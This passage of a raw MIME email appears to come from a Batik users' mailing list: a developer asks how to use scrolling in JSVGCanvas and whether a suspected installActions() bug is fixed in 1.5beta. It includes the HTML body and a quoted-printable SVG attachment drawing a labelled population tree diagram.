release has this bug fixed? Please tell me the way in which I can use scrolling functionality on JSVGCanvas. Iam attaching one of my SVG files for your reference. Regards, Geeta Shukla Persistent Systems Ltd, Pune, India - 16 Ph: (020)5678900*671 Email: [email protected] ------=_NextPart_001_0018_01C2D213.89E51AE0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD><TITLE></TITLE> <META content=3D"text/html; charset=3Diso-8859-1" = http-equiv=3DContent-Type> <META content=3D"MSHTML 5.00.2920.0" name=3DGENERATOR></HEAD> <BODY> <P>Hi,<BR><BR>I am using <FONT color=3D#0000ff>Batik 1.1.1 </FONT>for my = project=20 to render SVG files.<BR><BR>The problem is that I cannot make use of the = inner=20 class/fields of JSVGCanvas for scrolling left/right/top/bottom. I tried = looking=20 through the <FONT color=3D#0000ff>JSVGCanvas.java </FONT>file and found = that the=20 method <FONT color=3D#0000ff>"installActions()" </FONT>makes a call to = all the=20 required inner classes, puts them in a locally created ActionMap = hashtable and=20 returns. This seems to me a bug. Does the 1.5beta release has this bug=20 fixed?<BR></P> <P>Please tell me the way in which I can use scrolling functionality on=20 JSVGCanvas. Iam attaching one of my SVG files for your reference.</P> <P>&nbsp;</P> <P>Regards,</P> <P>Geeta Shukla</P> <P>Persistent Systems Ltd, Pune, India - 16</P> <P>Ph: (020)5678900*671</P> <P>Email: <A=20 href=3D"mailto:[email protected]">[email protected].= in</A></P> <P>&nbsp;</P> <P><BR>&nbsp;</P></BODY></HTML> ------=_NextPart_001_0018_01C2D213.89E51AE0-- ------=_NextPart_000_0017_01C2D213.89E51AE0 Content-Type: image/svg+xml; name="SVG_3.svg" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="SVG_3.svg" <?xml version=3D"1.0" encoding=3D"UTF-8" standalone=3D"no"?><svg = atn=3D"val" contentScriptType=3D"text/ecmascript" = contentStyleType=3D"text/css" preserveAspectRatio=3D"xMinYMin meet" = xmlns=3D"http://www.w3.org/2000/svg" zoomAndPan=3D"magnify"><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"18" x2=3D"18" = y1=3D"411" y2=3D"1194"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"18" x2=3D"36" = y1=3D"411" y2=3D"411"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"36" x2=3D"36" = y1=3D"27" y2=3D"795"/><line style=3D"stroke:rgb(0,0,0);stroke-width:1.0" = x1=3D"36" x2=3D"540" y1=3D"27" y2=3D"27"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"540" = y1=3D"18" y2=3D"36"/><line style=3D"stroke:rgb(0,0,0);stroke-width:1.0" = x1=3D"540" x2=3D"558" y1=3D"18" y2=3D"18"/><text style=3D"font-size:12" = x=3D"559" y=3D"18">W._Pygmy_(1)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"36" y2=3D"36"/><text style=3D"font-size:12" x=3D"559" = y=3D"36">W._Pygmy_(6)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"36" x2=3D"54" = y1=3D"795" y2=3D"795"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"54" x2=3D"54" = y1=3D"516" y2=3D"1075"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"54" x2=3D"72" = y1=3D"516" y2=3D"516"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"72" x2=3D"72" = y1=3D"136" y2=3D"897"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"72" x2=3D"468" = y1=3D"136" y2=3D"136"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"468" x2=3D"468" = y1=3D"114" y2=3D"159"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"468" x2=3D"486" = y1=3D"114" y2=3D"114"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"486" x2=3D"486" = y1=3D"87" y2=3D"142"/><line style=3D"stroke:rgb(0,0,0);stroke-width:1.0" = x1=3D"486" x2=3D"504" y1=3D"87" y2=3D"87"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"504" x2=3D"504" = y1=3D"63" y2=3D"112"/><line style=3D"stroke:rgb(0,0,0);stroke-width:1.0" = x1=3D"504" x2=3D"540" y1=3D"63" y2=3D"63"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"540" = y1=3D"54" y2=3D"72"/><line style=3D"stroke:rgb(0,0,0);stroke-width:1.0" = x1=3D"540" x2=3D"558" y1=3D"54" y2=3D"54"/><text style=3D"font-size:12" = x=3D"559" y=3D"54">Kung_(7)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"72" y2=3D"72"/><text style=3D"font-size:12" x=3D"559" = y=3D"72">Kung_(9)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"504" x2=3D"522" = y1=3D"112" y2=3D"112"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"522" = y1=3D"99" y2=3D"126"/><line style=3D"stroke:rgb(0,0,0);stroke-width:1.0" = x1=3D"522" x2=3D"540" y1=3D"99" y2=3D"99"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"540" = y1=3D"90" y2=3D"108"/><line style=3D"stroke:rgb(0,0,0);stroke-width:1.0" = x1=3D"540" x2=3D"558" y1=3D"90" y2=3D"90"/><text style=3D"font-size:12" = x=3D"559" y=3D"90">Kung_(10)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"108" y2=3D"108"/><text style=3D"font-size:12" x=3D"559" = y=3D"108">Kung_(13)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"558" = y1=3D"126" y2=3D"126"/><text style=3D"font-size:12" x=3D"559" = y=3D"126">Kung_(19)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"486" x2=3D"558" = y1=3D"142" y2=3D"142"/><text style=3D"font-size:12" x=3D"559" = y=3D"142">Kung_(17)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"468" x2=3D"558" = y1=3D"159" y2=3D"159"/><text style=3D"font-size:12" x=3D"559" = y=3D"159">Kung_(22)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"72" x2=3D"90" = y1=3D"897" y2=3D"897"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"90" x2=3D"90" = y1=3D"787" y2=3D"1008"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"90" x2=3D"108" = y1=3D"787" y2=3D"787"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"108" x2=3D"108" = y1=3D"584" y2=3D"991"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"108" x2=3D"126" = y1=3D"584" y2=3D"584"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"126" x2=3D"126" = y1=3D"230" y2=3D"938"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"126" x2=3D"468" = y1=3D"230" y2=3D"230"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"468" x2=3D"468" = y1=3D"195" y2=3D"265"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"468" x2=3D"486" = y1=3D"195" y2=3D"195"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"486" x2=3D"486" = y1=3D"176" y2=3D"214"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"486" x2=3D"558" = y1=3D"176" y2=3D"176"/><text style=3D"font-size:12" x=3D"559" = y=3D"176">Yoruban_(51)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"486" x2=3D"504" = y1=3D"214" y2=3D"214"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"504" x2=3D"504" = y1=3D"194" y2=3D"234"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"504" x2=3D"558" = y1=3D"194" y2=3D"194"/><text style=3D"font-size:12" x=3D"559" = y=3D"194">E._Pygmy_(68)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"504" x2=3D"522" = y1=3D"234" y2=3D"234"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"522" = y1=3D"221" y2=3D"248"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"540" = y1=3D"221" y2=3D"221"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"540" = y1=3D"212" y2=3D"230"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"212" y2=3D"212"/><text style=3D"font-size:12" x=3D"559" = y=3D"212">E._Pygmy_(69)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"230" y2=3D"230"/><text style=3D"font-size:12" x=3D"559" = y=3D"230">E._Pygmy_(73)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"558" = y1=3D"248" y2=3D"248"/><text style=3D"font-size:12" x=3D"559" = y=3D"248">E._Pygmy_(70)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"468" x2=3D"558" = y1=3D"265" y2=3D"265"/><text style=3D"font-size:12" x=3D"559" = y=3D"265">Asian_(58)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"126" x2=3D"144" = y1=3D"938" y2=3D"938"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"144" x2=3D"144" = y1=3D"912" y2=3D"964"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"144" x2=3D"162" = y1=3D"912" y2=3D"912"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"162" x2=3D"162" = y1=3D"887" y2=3D"937"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"162" x2=3D"180" = y1=3D"887" y2=3D"887"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"180" x2=3D"180" = y1=3D"855" y2=3D"920"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"180" x2=3D"198" = y1=3D"855" y2=3D"855"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"198" x2=3D"198" = y1=3D"817" y2=3D"893"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"198" x2=3D"216" = y1=3D"817" y2=3D"817"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"216" x2=3D"216" = y1=3D"768" y2=3D"866"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"216" x2=3D"234" = y1=3D"768" y2=3D"768"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"234" x2=3D"234" = y1=3D"710" y2=3D"826"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"234" x2=3D"252" = y1=3D"710" y2=3D"710"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"252" x2=3D"252" = y1=3D"658" y2=3D"762"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"252" x2=3D"270" = y1=3D"658" y2=3D"658"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"270" x2=3D"270" = y1=3D"619" y2=3D"697"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"270" x2=3D"288" = y1=3D"619" y2=3D"619"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"288" x2=3D"288" = y1=3D"595" y2=3D"644"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"288" x2=3D"306" = y1=3D"595" y2=3D"595"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"306" x2=3D"306" = y1=3D"573" y2=3D"618"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"306" x2=3D"324" = y1=3D"573" y2=3D"573"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"324" x2=3D"324" = y1=3D"546" y2=3D"601"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"324" x2=3D"342" = y1=3D"546" y2=3D"546"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"342" x2=3D"342" = y1=3D"509" y2=3D"584"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"342" x2=3D"360" = y1=3D"509" y2=3D"509"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"360" x2=3D"360" = y1=3D"461" y2=3D"557"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"360" x2=3D"378" = y1=3D"461" y2=3D"461"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"378" x2=3D"378" = y1=3D"392" y2=3D"530"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"378" x2=3D"396" = y1=3D"392" y2=3D"392"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"396" x2=3D"396" = y1=3D"316" y2=3D"469"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"396" x2=3D"504" = y1=3D"316" y2=3D"316"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"504" x2=3D"504" = y1=3D"296" y2=3D"336"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"504" x2=3D"522" = y1=3D"296" y2=3D"296"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"522" = y1=3D"283" y2=3D"310"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"558" = y1=3D"283" y2=3D"283"/><text style=3D"font-size:12" x=3D"559" = y=3D"283">Yoruban_(57)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"540" = y1=3D"310" y2=3D"310"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"540" = y1=3D"301" y2=3D"319"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"301" y2=3D"301"/><text style=3D"font-size:12" x=3D"559" = y=3D"301">European_(89)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"319" y2=3D"319"/><text style=3D"font-size:12" x=3D"559" = y=3D"319">Asian_(90)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"504" x2=3D"558" = y1=3D"336" y2=3D"336"/><text style=3D"font-size:12" x=3D"559" = y=3D"336">Yoruban_(106)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"396" x2=3D"414" = y1=3D"469" y2=3D"469"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"414" x2=3D"414" = y1=3D"434" y2=3D"505"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"414" x2=3D"432" = y1=3D"434" y2=3D"434"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"432" x2=3D"432" = y1=3D"390" y2=3D"479"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"432" x2=3D"450" = y1=3D"390" y2=3D"390"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"450" x2=3D"450" = y1=3D"354" y2=3D"426"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"450" x2=3D"558" = y1=3D"354" y2=3D"354"/><text style=3D"font-size:12" x=3D"559" = y=3D"354">European_(99)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"450" x2=3D"468" = y1=3D"426" y2=3D"426"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"468" x2=3D"468" = y1=3D"391" y2=3D"461"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"468" x2=3D"486" = y1=3D"391" y2=3D"391"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"486" x2=3D"486" = y1=3D"372" y2=3D"410"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"486" x2=3D"558" = y1=3D"372" y2=3D"372"/><text style=3D"font-size:12" x=3D"559" = y=3D"372">European_(101)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"486" x2=3D"504" = y1=3D"410" y2=3D"410"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"504" x2=3D"504" = y1=3D"390" y2=3D"430"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"504" x2=3D"558" = y1=3D"390" y2=3D"390"/><text style=3D"font-size:12" x=3D"559" = y=3D"390">European_(114)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"504" x2=3D"522" = y1=3D"430" y2=3D"430"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"522" = y1=3D"417" y2=3D"444"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"540" = y1=3D"417" y2=3D"417"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"540" = y1=3D"408" y2=3D"426"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"408" y2=3D"408"/><text style=3D"font-size:12" x=3D"559" = y=3D"408">European_(116)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"426" y2=3D"426"/><text style=3D"font-size:12" x=3D"559" = y=3D"426">European_(118)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"558" = y1=3D"444" y2=3D"444"/><text style=3D"font-size:12" x=3D"559" = y=3D"444">European_(117)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"468" x2=3D"558" = y1=3D"461" y2=3D"461"/><text style=3D"font-size:12" x=3D"559" = y=3D"461">Yoruban_(103)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"432" x2=3D"558" = y1=3D"479" y2=3D"479"/><text style=3D"font-size:12" x=3D"559" = y=3D"479">European_(115)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"414" x2=3D"540" = y1=3D"505" y2=3D"505"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"540" = y1=3D"496" y2=3D"514"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"496" y2=3D"496"/><text style=3D"font-size:12" x=3D"559" = y=3D"496">European_(111)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"514" y2=3D"514"/><text style=3D"font-size:12" x=3D"559" = y=3D"514">Asian_(112)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"378" x2=3D"558" = y1=3D"530" y2=3D"530"/><text style=3D"font-size:12" x=3D"559" = y=3D"530">Asian_(91)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"360" x2=3D"540" = y1=3D"557" y2=3D"557"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"540" = y1=3D"548" y2=3D"566"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"548" y2=3D"548"/><text style=3D"font-size:12" x=3D"559" = y=3D"548">Yoruban_(60)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"566" y2=3D"566"/><text style=3D"font-size:12" x=3D"559" = y=3D"566">Asian_(88)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"342" x2=3D"558" = y1=3D"584" y2=3D"584"/><text style=3D"font-size:12" x=3D"559" = y=3D"584">Asian_(122)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"324" x2=3D"558" = y1=3D"601" y2=3D"601"/><text style=3D"font-size:12" x=3D"559" = y=3D"601">Asian_(113)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"306" x2=3D"558" = y1=3D"618" y2=3D"618"/><text style=3D"font-size:12" x=3D"559" = y=3D"618">New_Guinean_(108)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"288" x2=3D"540" = y1=3D"644" y2=3D"644"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"540" = y1=3D"635" y2=3D"653"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"635" y2=3D"635"/><text style=3D"font-size:12" x=3D"559" = y=3D"635">Asian_(126)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"653" y2=3D"653"/><text style=3D"font-size:12" x=3D"559" = y=3D"653">Asian_(128)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"270" x2=3D"522" = y1=3D"697" y2=3D"697"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"522" = y1=3D"679" y2=3D"715"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"540" = y1=3D"679" y2=3D"679"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"540" = y1=3D"670" y2=3D"688"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"670" y2=3D"670"/><text style=3D"font-size:12" x=3D"559" = y=3D"670">European_(94)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"688" y2=3D"688"/><text style=3D"font-size:12" x=3D"559" = y=3D"688">Asian_(95)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"540" = y1=3D"715" y2=3D"715"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"540" = y1=3D"706" y2=3D"724"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"706" y2=3D"706"/><text style=3D"font-size:12" x=3D"559" = y=3D"706">European_(119)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"724" y2=3D"724"/><text style=3D"font-size:12" x=3D"559" = y=3D"724">European_(120)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"252" x2=3D"504" = y1=3D"762" y2=3D"762"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"504" x2=3D"504" = y1=3D"742" y2=3D"782"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"504" x2=3D"558" = y1=3D"742" y2=3D"742"/><text style=3D"font-size:12" x=3D"559" = y=3D"742">Asian_(84)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"504" x2=3D"522" = y1=3D"782" y2=3D"782"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"522" = y1=3D"769" y2=3D"796"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"540" = y1=3D"769" y2=3D"769"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"540" = y1=3D"760" y2=3D"778"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"760" y2=3D"760"/><text style=3D"font-size:12" x=3D"559" = y=3D"760">Asian_(85)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"778" y2=3D"778"/><text style=3D"font-size:12" x=3D"559" = y=3D"778">Asian_(86)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"558" = y1=3D"796" y2=3D"796"/><text style=3D"font-size:12" x=3D"559" = y=3D"796">European_(96)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"234" x2=3D"522" = y1=3D"826" y2=3D"826"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"522" = y1=3D"813" y2=3D"840"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"558" = y1=3D"813" y2=3D"813"/><text style=3D"font-size:12" x=3D"559" = y=3D"813">Yoruban_(78)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"540" = y1=3D"840" y2=3D"840"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"540" = y1=3D"831" y2=3D"849"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"831" y2=3D"831"/><text style=3D"font-size:12" x=3D"559" = y=3D"831">New_Guinean_(79)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"849" y2=3D"849"/><text style=3D"font-size:12" x=3D"559" = y=3D"849">New_Guinean_(80)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"216" x2=3D"558" = y1=3D"866" y2=3D"866"/><text style=3D"font-size:12" x=3D"559" = y=3D"866">European_(104)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"198" x2=3D"540" = y1=3D"893" y2=3D"893"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"540" = y1=3D"884" y2=3D"902"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"884" y2=3D"884"/><text style=3D"font-size:12" x=3D"559" = y=3D"884">Asian_(92)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"902" y2=3D"902"/><text style=3D"font-size:12" x=3D"559" = y=3D"902">Asian_(93)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"180" x2=3D"558" = y1=3D"920" y2=3D"920"/><text style=3D"font-size:12" x=3D"559" = y=3D"920">Asian_(87)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"162" x2=3D"558" = y1=3D"937" y2=3D"937"/><text style=3D"font-size:12" x=3D"559" = y=3D"937">New_Guinean_(110)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"144" x2=3D"540" = y1=3D"964" y2=3D"964"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"540" = y1=3D"955" y2=3D"973"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"955" y2=3D"955"/><text style=3D"font-size:12" x=3D"559" = y=3D"955">Asian_(74)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"973" y2=3D"973"/><text style=3D"font-size:12" x=3D"559" = y=3D"973">Asian_(75)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"108" x2=3D"558" = y1=3D"991" y2=3D"991"/><text style=3D"font-size:12" x=3D"559" = y=3D"991">European_(102)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"90" x2=3D"558" = y1=3D"1008" y2=3D"1008"/><text style=3D"font-size:12" x=3D"559" = y=3D"1008">New_Guinean_(81)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"54" x2=3D"468" = y1=3D"1075" y2=3D"1075"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"468" x2=3D"468" = y1=3D"1040" y2=3D"1111"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"468" x2=3D"486" = y1=3D"1040" y2=3D"1040"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"486" x2=3D"486" = y1=3D"1024" y2=3D"1057"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"486" x2=3D"558" = y1=3D"1024" y2=3D"1024"/><text style=3D"font-size:12" x=3D"559" = y=3D"1024">Asian_(23)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"486" x2=3D"504" = y1=3D"1057" y2=3D"1057"/><line = 